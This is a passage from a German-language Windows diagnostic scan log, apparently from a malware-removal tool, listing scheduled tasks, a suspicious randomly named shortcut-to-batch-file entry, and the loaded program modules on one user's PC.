Task: {5695EF73-2130-43FB-B248-51C430A387A4} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-07-26] (NVIDIA Corporation)
Task: {577763E4-17E6-4D07-A67F-13108AB9872D} - System32\Tasks\Uninstaller_Install_Martin_Walser => C:\Program Files (x86)\IObit\Advanced SystemCare\ActionCenterDownloader.exe [2017-02-08] (IObit)
Task: {5DA81636-2ECE-4830-AE1B-077999FE28A7} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA1d23700db892b60 => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.)
Task: {6277B01E-8C65-4DE6-9712-35ABEBF90E78} - System32\Tasks\StartMenu8_Start => C:\Program Files (x86)\IObit\Classic Start\Start_Active.exe [2016-11-05] ()
Task: {64670950-29B6-4622-AFED-B1C8B63CBDAB} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-07-26] (NVIDIA Corporation)
Task: {6A99B42D-8E1B-44BD-87EB-FD3F84C0DCFC} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe [2016-05-08] (Google Inc.)
Task: {709DF1A0-05D5-4212-A64F-3E935E5E0E21} - System32\Tasks\Driver Booster SkipUAC (*****) => C:\Program Files (x86)\IObit\Driver Booster\4.4.0\DriverBooster.exe [2017-05-03] (IObit)
Task: {747EDABD-FFCF-4A4A-9090-6FB45E52DF32} - System32\Tasks\Avira\System Speedup\Delayed Startup\All users\4 => C:\Program Files\SmartTechnology\Software\SaiMfd.exe [2013-04-16] (Saitek)
Task: {749258DE-50AA-45E3-A106-4D57EA1939D4} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Keine Datei <==== ACHTUNG
Task: {8161C861-2F39-4F66-9738-F0E729E543F8} - System32\Tasks\Avira\System Speedup\Delayed Startup\*****\4 => G:\Games\World_of_Warships\WargamingGameUpdater.exe [2017-06-02] (Wargaming.net) <==== ACHTUNG
Task: {841B981A-ABD1-49B5-9670-3344025F09FD} - System32\Tasks\Avira\System Speedup\Delayed Startup\All users\3 => C:\Program Files (x86)\Samsung\Kies\KiesTrayAgent.exe [2016-11-16] (Samsung Electronics Co., Ltd.)
Task: {8C2C2E44-4C80-4443-B5F3-75EBC05B98DF} - System32\Tasks\Avira\System Speedup\Delayed Startup\*****\1 => C:\Program Files (x86)\MyDrive Connect\TomTom MyDrive Connect.exe [2017-05-08] (TomTom) <==== ACHTUNG
Task: {8CD60BBA-13BE-4C72-9BD2-F7665F5A12E1} - System32\Tasks\Avira\System Speedup\Delayed Startup\All users\1 => C:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe [2012-09-13] (Logitech Inc.)
Task: {96B4A76A-E0A9-497A-B6C0-43AC09DF5333} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-07-26] (NVIDIA Corporation)
Task: {98644CA8-C542-4436-AFE3-3272F8AD1B07} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.)
Task: {9F40D7E3-13EC-42F1-B658-3B8834985725} - System32\Tasks\Avira\System Speedup\TestScheduler => C:\Program Files (x86)\Avira\System Speedup\Avira.SystemSpeedup.Core.Common.Starter.exe [2017-06-28] (Avira Operations GmbH & Co. KG)
Task: {A1DC91F7-197C-4208-AE19-8D4190EB04A4} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2017-07-26] (NVIDIA Corporation)
Task: {A36A36C9-7C2C-4BAB-8C32-209FE107A789} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-08-01] (Google Inc.)
Task: {A59EC191-5863-4668-8DC4-E3B297762399} - System32\Tasks\Avira\System Speedup\Delayed Startup\*****\3 => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.) <==== ACHTUNG
Task: {A6E3E460-B5D2-4349-BC82-DDCD409BC7D5} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Keine Datei <==== ACHTUNG
Task: {AAFBDA33-C21C-4668-9CAF-14B06F45FC3D} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-07-26] (NVIDIA Corporation)
Task: {AD2988BE-BBBA-47A2-9FE4-E814CB5C6B95} - System32\Tasks\Avira\System Speedup\Delayed Startup\*****\10 => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe [2016-05-08] (Google Inc.) <==== ACHTUNG
Task: {B15A2E8C-80BE-49E7-93D9-77E6DB8733A2} - System32\Tasks\Driver Booster Scheduler => C:\Program Files (x86)\IObit\Driver Booster\4.4.0\Scheduler.exe [2017-03-28] (IObit)
Task: {B5B3C199-8D05-4D87-98CE-C413AAFB8290} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [2017-07-26] (NVIDIA Corporation)
Task: {B75DE4BB-2CA4-4515-85EA-0B346AAB0160} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.)
Task: {B8F24EEC-1F14-4791-AFC9-1BB058D7BAA4} - System32\Tasks\Uninstaller_SkipUac_Martin_Walser => C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe [2017-01-19] (IObit)
Task: {B918F1B1-79A9-45D6-8195-051607EF371D} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core1d23700db7c7e10 => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.)
Task: {BDBA9F4F-934F-471F-9115-BE63D26C1662} - System32\Tasks\Avira\System Speedup\Delayed Startup\*****\13 => C:\Program Files (x86)\IObit\Advanced SystemCare\ASCTray.exe [2017-05-17] (IObit) <==== ACHTUNG
Task: {C1A8AE88-41C5-4E46-BD3E-B0C94C9179A9} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA1d25a61a78c34b7 => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe [2016-05-08] (Google Inc.)
Task: {D2EEA344-C1E2-4667-98B9-3F9655F456C6} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core1d25a61a7879fb6 => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe [2016-05-08] (Google Inc.)
Task: {D4B0982F-B146-48F0-85ED-8BC5CF94050B} - System32\Tasks\Avira\System Speedup\Delayed Startup\All users\5 => C:\WINDOWS\System\3DG4me.exe
Task: {D5103FCE-77CB-4D47-A4F1-5D28A4A4ED16} - System32\Tasks\AviraSystemSpeedupUpdate => C:\ProgramData\Avira\SystemSpeedup\Update\avira_speedup_setup_update.exe [2017-07-11] (Avira Operations GmbH & Co. KG                              )
Task: {D717F808-00FE-473D-9D5C-9010C610A490} - System32\Tasks\Avira\System Speedup\Delayed Startup\*****\6 => G:\Program Files (x86)\Steam\steam.exe [2017-07-18] (Valve Corporation) <==== ACHTUNG
Task: {DB66428E-B85F-4EDD-BC33-43CAA577BBCA} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Keine Datei <==== ACHTUNG
Task: {DBC40A0D-D57C-4753-B5DE-B1900FC79412} - System32\Tasks\Avira\System Speedup\Delayed Startup\All users\2 => "C:\WINDOWS\system32\rundll32.exe" C:\WINDOWS\system32\nvspcap64.dll,ShadowPlayOnSystemStart
Task: {E7FD477B-E42F-486D-87DC-17D9865373CD} - System32\Tasks\SmartDefrag_Startup => C:\Program Files (x86)\IObit\Smart Defrag\SmartDefrag.exe [2017-05-31] (IObit)
Task: {EA62DC1E-9D06-46DB-9B67-3FB813C4E777} - System32\Tasks\Avira\System Speedup\Delayed Startup\*****\7 => C:\Program Files (x86)\Avira\System Speedup\Avira.SystemSpeedup.Core.Common.Starter.exe [2017-06-28] (Avira Operations GmbH & Co. KG) <==== ACHTUNG
Task: {F5EF43DC-B84B-4E3D-9B94-D72B394C253C} - System32\Tasks\Avira\System Speedup\Delayed Startup\*****\5 => C:\Users\*****\AppData\Local\Akamai\netsession_win.exe [2017-01-03] (Akamai Technologies, Inc.) <==== ACHTUNG
Task: {FDC309C3-7CAB-43AD-8822-78E3C63B88B4} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Keine Datei <==== ACHTUNG

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core1d23700db7c7e10.job => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA1d23700db892b60.job => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core.job => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA.job => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\StartMenu8_Start.job => C:\Program Files (x86)\IObit\Classic Start\Start_Active.exe
Task: C:\WINDOWS\Tasks\Uninstaller_Install_Martin_Walser.job => C:\Program Files (x86)\IObit\Advanced SystemCare\ActionCenterDownloader.exe
Task: C:\WINDOWS\Tasks\Uninstaller_SkipUac_Martin_Walser.job => C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe

==================== Verknüpfungen & WMI ========================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)


Shortcut: C:\Users\*****\AppData\Local\Rvurcez\bdobyjg.lnk -> C:\Users\*****\AppData\Local\Bizpiwcinu\arvikxihn.bat ()

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2017-04-19 20:10 - 2017-07-19 01:24 - 000133568 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2017-03-18 22:58 - 2017-03-18 22:58 - 000138000 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll
2015-03-07 02:07 - 2015-03-07 02:07 - 000908568 _____ () C:\Program Files\Logitech Gaming Software\libGLESv2.dll
2017-01-24 00:19 - 2017-01-24 00:19 - 001096824 _____ () C:\Program Files\Logitech Gaming Software\platforms\qwindows.dll
2015-03-07 02:07 - 2015-03-07 02:07 - 000060184 _____ () C:\Program Files\Logitech Gaming Software\libEGL.dll
2017-01-24 00:19 - 2017-01-24 00:19 - 000241784 _____ () C:\Program Files\Logitech Gaming Software\imageformats\qjpeg.dll
2017-06-30 13:22 - 2017-06-30 13:22 - 000069632 _____ () C:\Program Files\CCleaner\lang\lang-1031.dll
2012-09-13 00:38 - 2012-09-13 00:38 - 000264040 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\CameraHelperShell.exe
2016-09-29 12:59 - 2017-07-26 19:09 - 001267136 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\libprotobuf.dll
2017-07-28 18:14 - 2017-07-26 19:08 - 000034240 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\boost_system-vc120-mt-1_58.dll
2017-07-28 18:14 - 2017-07-26 19:08 - 000920000 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\boost_regex-vc120-mt-1_58.dll
2017-06-23 19:21 - 2017-06-23 19:21 - 001199816 _____ () C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.8241.41275.0_x64__8wekyb3d8bbwe\Office.UI.Xaml.Word.dll
2017-06-23 19:21 - 2017-06-23 19:21 - 013207232 _____ () C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.8241.41275.0_x64__8wekyb3d8bbwe\Office.UI.Xaml.Core.dll
2017-07-14 19:07 - 2017-07-12 22:01 - 000025408 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\QtWebEngineProcess.exe
2017-03-18 22:59 - 2017-03-20 06:36 - 001731072 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2017-08-01 01:54 - 2017-07-25 09:42 - 003824472 _____ () C:\Program Files (x86)\Google\Chrome\Application\60.0.3112.78\libglesv2.dll
2017-08-01 01:54 - 2017-07-25 09:42 - 000100184 _____ () C:\Program Files (x86)\Google\Chrome\Application\60.0.3112.78\libegl.dll
2017-03-13 19:39 - 2016-06-21 20:30 - 000442144 _____ () C:\Program Files (x86)\IObit\IObit Uninstaller\madExcept_.bpl
2017-03-13 19:39 - 2016-06-21 20:29 - 000210720 _____ () C:\Program Files (x86)\IObit\IObit Uninstaller\madBasic_.bpl
2017-03-13 19:39 - 2016-06-21 20:29 - 000059680 _____ () C:\Program Files (x86)\IObit\IObit Uninstaller\madDisAsm_.bpl
2017-07-31 20:55 - 2017-04-18 19:01 - 002493440 _____ () G:\Program Files (x86)\Origin\libGLESv2.dll
2017-06-06 17:27 - 2016-08-18 18:43 - 000442144 _____ () C:\Program Files (x86)\IObit\Advanced SystemCare\madExcept_.bpl
2017-06-06 17:27 - 2016-08-18 18:43 - 000210720 _____ () C:\Program Files (x86)\IObit\Advanced SystemCare\madBasic_.bpl
2017-06-06 17:27 - 2016-08-18 18:43 - 000059680 _____ () C:\Program Files (x86)\IObit\Advanced SystemCare\madDisAsm_.bpl
2017-06-06 17:27 - 2016-11-01 10:11 - 000078624 _____ () C:\Program Files (x86)\IObit\Advanced SystemCare\GetProcessDLL.dll
2017-06-08 20:20 - 2016-01-11 17:03 - 000899872 _____ () C:\Program Files (x86)\IObit\Smart Defrag\webres.dll
2017-06-08 20:20 - 2016-01-11 17:02 - 000630048 _____ () C:\Program Files (x86)\IObit\Smart Defrag\ProductStatistics.dll
2017-06-06 17:27 - 2015-12-28 13:50 - 000899872 _____ () C:\Program Files (x86)\IObit\Advanced SystemCare\webres.dll
2017-06-06 17:27 - 2017-05-17 13:45 - 000631584 _____ () C:\Program Files (x86)\IObit\Advanced SystemCare\ProductStatistics.dll
2012-09-13 00:38 - 2012-09-13 00:38 - 000341352 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtXml4.dll
2012-09-13 00:38 - 2012-09-13 00:38 - 002144104 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtCore4.dll
2012-09-13 00:38 - 2012-09-13 00:38 - 007955304 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtGui4.dll
2012-09-13 00:38 - 2012-09-13 00:38 - 000028008 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\imageformats\QGif4.dll
2012-09-13 00:38 - 2012-09-13 00:38 - 000127336 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\imageformats\QJpeg4.dll
2012-09-13 00:39 - 2012-09-13 00:39 - 000336232 _____ () C:\Program Files (x86)\Common Files\logishrd\LWSPlugins\LWS\Applets\CameraHelper\DevManagerCore.dll
2014-09-11 17:06 - 2014-09-11 17:06 - 000878592 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\platforms\qwindows.dll
2014-09-11 17:05 - 2014-09-11 17:05 - 000036352 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\bearer\qgenericbearer.dll
2014-09-11 17:06 - 2014-09-11 17:06 - 000038912 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\bearer\qnativerwifibearer.dll
2014-09-11 17:14 - 2014-09-11 17:14 - 000032256 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qdds.dll
2014-09-11 17:05 - 2014-09-11 17:05 - 000021504 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qgif.dll
2014-09-11 17:14 - 2014-09-11 17:14 - 000027648 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qicns.dll
2014-09-11 17:05 - 2014-09-11 17:05 - 000021504 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qico.dll
2014-09-11 17:14 - 2014-09-11 17:14 - 000381952 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qjp2.dll
2014-09-11 17:05 - 2014-09-11 17:05 - 000204800 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qjpeg.dll
2014-09-11 17:14 - 2014-09-11 17:14 - 000218112 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qmng.dll
2014-09-11 17:08 - 2014-09-11 17:08 - 000015872 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qsvg.dll
2014-09-11 17:14 - 2014-09-11 17:14 - 000015360 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qtga.dll
2014-09-11 17:15 - 2014-09-11 17:15 - 000307712 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qtiff.dll
2014-09-11 17:15 - 2014-09-11 17:15 - 000014848 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qwbmp.dll
2014-09-11 17:15 - 2014-09-11 17:15 - 000252928 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qwebp.dll
2017-01-29 16:41 - 2017-07-26 19:09 - 001040320 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\libprotobuf.dll
2016-04-09 00:35 - 2016-04-09 00:35 - 003481600 _____ () C:\Users\*****\AppData\Local\Programs\Google\Google Photos Backup\gpuploader_i18n.dll
2017-04-13 21:54 - 2017-07-26 19:08 - 069820864 _____ () C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\libcef.dll
2017-06-01 23:04 - 2017-05-17 03:54 - 000678176 _____ () G:\Program Files (x86)\Steam\SDL2.dll
2017-03-18 00:47 - 2016-09-01 03:02 - 004969248 _____ () G:\Program Files (x86)\Steam\v8.dll
2017-07-24 18:15 - 2017-07-18 02:33 - 002497824 _____ () G:\Program Files (x86)\Steam\video.dll
2017-03-18 00:47 - 2016-01-27 09:49 - 000332800 _____ () G:\Program Files (x86)\Steam\libavresample-2.dll
2017-03-18 00:47 - 2016-01-27 09:49 - 000491008 _____ () G:\Program Files (x86)\Steam\libavformat-56.dll
2017-03-18 00:47 - 2016-01-27 09:49 - 002549760 _____ () G:\Program Files (x86)\Steam\libavcodec-56.dll
2017-03-18 00:47 - 2016-01-27 09:49 - 000485888 _____ () G:\Program Files (x86)\Steam\libswscale-3.dll
2017-03-18 00:47 - 2016-01-27 09:49 - 000442880 _____ () G:\Program Files (x86)\Steam\libavutil-54.dll
2017-03-18 00:47 - 2016-09-01 03:02 - 001195296 _____ () G:\Program Files (x86)\Steam\icuuc.dll
2017-03-18 00:47 - 2016-09-01 03:02 - 001563936 _____ () G:\Program Files (x86)\Steam\icui18n.dll
2017-07-24 18:15 - 2017-07-18 02:33 - 000884512 _____ () G:\Program Files (x86)\Steam\bin\chromehtml.DLL
2017-03-18 00:47 - 2016-07-05 00:17 - 000266560 _____ () G:\Program Files (x86)\Steam\openvr_api.dll
2017-06-08 20:06 - 2017-05-17 03:54 - 000678176 _____ () G:\Program Files (x86)\Steam\bin\cef\cef.win7\SDL2.dll
2017-07-12 19:34 - 2017-07-06 19:58 - 073088800 _____ () G:\Program Files (x86)\Steam\bin\cef\cef.win7\libcef.dll
2017-07-24 18:15 - 2017-07-18 02:33 - 000384288 _____ () G:\Program Files (x86)\Steam\steam.dll
2017-05-06 18:04 - 2017-04-27 13:54 - 000114664 _____ () C:\Program Files (x86)\Common Files\DVDVideoSoft\lib\zlib1.dll
2017-05-06 18:04 - 2017-04-27 13:54 - 000024040 _____ () C:\Program Files (x86)\Common Files\DVDVideoSoft\lib\boost_system-vc120-mt-1_56.dll
2017-05-06 18:04 - 2017-04-27 13:54 - 000048104 _____ () C:\Program Files (x86)\Common Files\DVDVideoSoft\lib\boost_date_time-vc120-mt-1_56.dll
2017-05-06 18:04 - 2017-04-27 13:54 - 000108008 _____ () C:\Program Files (x86)\Common Files\DVDVideoSoft\lib\boost_filesystem-vc120-mt-1_56.dll
2017-03-11 14:34 - 2015-12-29 12:29 - 000190240 _____ () C:\Program Files (x86)\IObit\Classic Start\madBasic_.bpl
2017-03-11 14:34 - 2015-12-29 12:30 - 000355616 _____ () C:\Program Files (x86)\IObit\Classic Start\madExcept_.bpl
2017-03-11 14:34 - 2015-12-29 12:30 - 000057632 _____ () C:\Program Files (x86)\IObit\Classic Start\madDisAsm_.bpl
2017-03-11 14:34 - 2015-12-29 12:30 - 000059680 _____ () C:\Program Files (x86)\IObit\Classic Start\parseAuto.dll
2017-03-11 14:34 - 2015-12-29 12:30 - 000275576 _____ () C:\Program Files (x86)\IObit\Classic Start\sqlite3.dll
2017-03-11 14:34 - 2015-12-29 12:31 - 000047904 _____ () C:\Program Files (x86)\IObit\Classic Start\winkey.dll
2017-03-06 22:52 - 2017-01-04 15:28 - 001958912 _____ () C:\Users\*****\AppData\Local\Discord\app-0.0.297\ffmpeg.dll
2017-03-06 22:52 - 2017-03-06 22:52 - 001082880 _____ () \\?\C:\Users\*****\AppData\Roaming\discord\0.0.297\modules\discord_voice\discord_voice.node
2017-03-06 22:52 - 2017-03-06 22:52 - 003750400 _____ () \\?\C:\Users\*****\AppData\Roaming\discord\0.0.297\modules\discord_voice\libdiscord.dll
2017-03-06 22:52 - 2017-03-06 22:52 - 000914432 _____ () \\?\C:\Users\*****\AppData\Roaming\discord\0.0.297\modules\discord_utils\discord_utils.node
2017-03-06 22:52 - 2017-03-06 22:52 - 001127424 _____ () \\?\C:\Users\*****\AppData\Roaming\discord\0.0.297\modules\discord_toaster\discord_toaster.node
2017-03-06 22:52 - 2017-01-04 15:28 - 002278912 _____ () C:\Users\*****\AppData\Local\Discord\app-0.0.297\libglesv2.dll
2017-03-06 22:52 - 2017-01-04 15:28 - 000096768 _____ () C:\Users\*****\AppData\Local\Discord\app-0.0.297\libegl.dll
2017-08-01 13:37 - 2017-08-01 13:37 - 000148992 _____ () \\?\C:\Users\*****\AppData\Local\Temp\72CA.tmp.node
2017-03-06 22:52 - 2017-04-27 20:44 - 002658296 _____ () \\?\C:\Users\*****\AppData\Roaming\discord\0.0.297\modules\discord_rpc\discord_rpc.node
2017-03-06 22:52 - 2017-03-22 20:44 - 002665976 _____ () \\?\C:\Users\*****\AppData\Roaming\discord\0.0.297\modules\discord_contact_import\discord_contact_import.node
2017-07-14 19:07 - 2017-07-12 21:58 - 000746816 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\dropbox_watchdog.dll
2017-07-14 19:07 - 2017-07-12 21:58 - 001787200 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\dropbox_crashpad.dll
2017-07-14 19:07 - 2017-07-12 21:58 - 000100296 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\_ctypes.pyd
2017-07-14 19:07 - 2017-07-12 21:58 - 000018888 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\select.pyd
2017-07-14 19:07 - 2017-07-12 22:01 - 000020800 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\tornado.speedups.pyd
2017-07-14 19:07 - 2017-07-12 21:58 - 000035792 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\_multiprocessing.pyd
2017-07-14 19:07 - 2017-07-12 21:59 - 000021848 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\cryptography.hazmat.bindings._constant_time.pyd
2017-07-14 19:07 - 2017-07-12 21:58 - 000125904 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\_cffi_backend.pyd
2017-07-14 19:07 - 2017-07-12 21:58 - 000694224 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\unicodedata.pyd
2017-07-14 19:07 - 2017-07-12 21:59 - 001862992 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\cryptography.hazmat.bindings._openssl.pyd
2017-07-14 19:07 - 2017-07-12 21:59 - 000022864 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\cryptography.hazmat.bindings._padding.pyd
2017-07-14 19:07 - 2017-07-12 21:58 - 000145864 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\pyexpat.pyd
2017-07-14 19:07 - 2017-07-12 21:58 - 000020432 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\faulthandler.pyd
2017-07-14 19:07 - 2017-07-12 21:58 - 000116688 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\pywintypes27.dll
2017-07-14 19:07 - 2017-07-12 21:58 - 000105928 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\win32api.pyd
2017-07-14 19:07 - 2017-07-12 22:01 - 000022864 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\winffi.crt.compiled._winffi_crt.pyd
2017-07-14 19:07 - 2017-07-12 21:59 - 000062784 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\psutil._psutil_windows.pyd
2017-07-14 19:07 - 2017-07-12 21:59 - 000040248 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\fastpath.pyd
2017-07-14 19:07 - 2017-07-12 21:58 - 000024528 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\win32event.pyd
2017-07-14 19:07 - 2017-07-12 21:58 - 000392656 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\pythoncom27.dll
2017-07-14 19:07 - 2017-07-12 21:58 - 000020936 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\mmapfile.pyd
2017-07-14 19:07 - 2017-07-12 21:58 - 000116176 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\win32security.pyd
2017-07-14 19:07 - 2017-07-12 22:01 - 000392512 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\win32com.shell.shell.pyd
2017-07-14 19:07 - 2017-07-12 21:58 - 000124880 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\win32file.pyd
2017-07-14 19:07 - 2017-07-12 22:01 - 000026456 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\winffi.kernel32.compiled._winffi_kernel32.pyd
2017-07-14 19:07 - 2017-07-12 21:58 - 000024016 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\win32clipboard.pyd
2017-07-14 19:07 - 2017-07-12 21:58 - 000175560 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\win32gui.pyd
2017-07-14 19:07 - 2017-07-12 21:58 - 000030160 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\win32pipe.pyd
2017-07-14 19:07 - 2017-07-12 21:58 - 000043472 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\win32process.pyd
2017-07-14 19:07 - 2017-07-12 21:58 - 000048592 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\win32service.pyd
2017-07-14 19:07 - 2017-07-12 21:58 - 000057808 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\win32evtlog.pyd
2017-07-14 19:07 - 2017-07-12 21:58 - 000024016 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\win32profile.pyd
2017-07-14 19:07 - 2017-07-12 21:59 - 000022336 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\cpuid.compiled._cpuid.pyd
2017-07-14 19:07 - 2017-07-12 22:01 - 000082264 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\winenumhandles.compiled._WinEnumHandles.pyd
2017-07-14 19:07 - 2017-07-12 22:01 - 000025432 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\winscreenshot.compiled._CaptureScreenshot.pyd
2017-07-14 19:07 - 2017-07-12 21:59 - 000027488 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\dropbox.infinite.win.compiled._driverinstallation.pyd
2017-07-14 19:07 - 2017-07-12 22:00 - 003928896 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\PyQt5.QtWidgets.pyd
2017-07-14 19:07 - 2017-07-12 21:58 - 000083912 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\sip.pyd
2017-07-14 19:07 - 2017-07-12 21:59 - 001826104 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\PyQt5.QtCore.pyd
2017-07-14 19:07 - 2017-07-12 22:00 - 001972024 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\PyQt5.QtGui.pyd
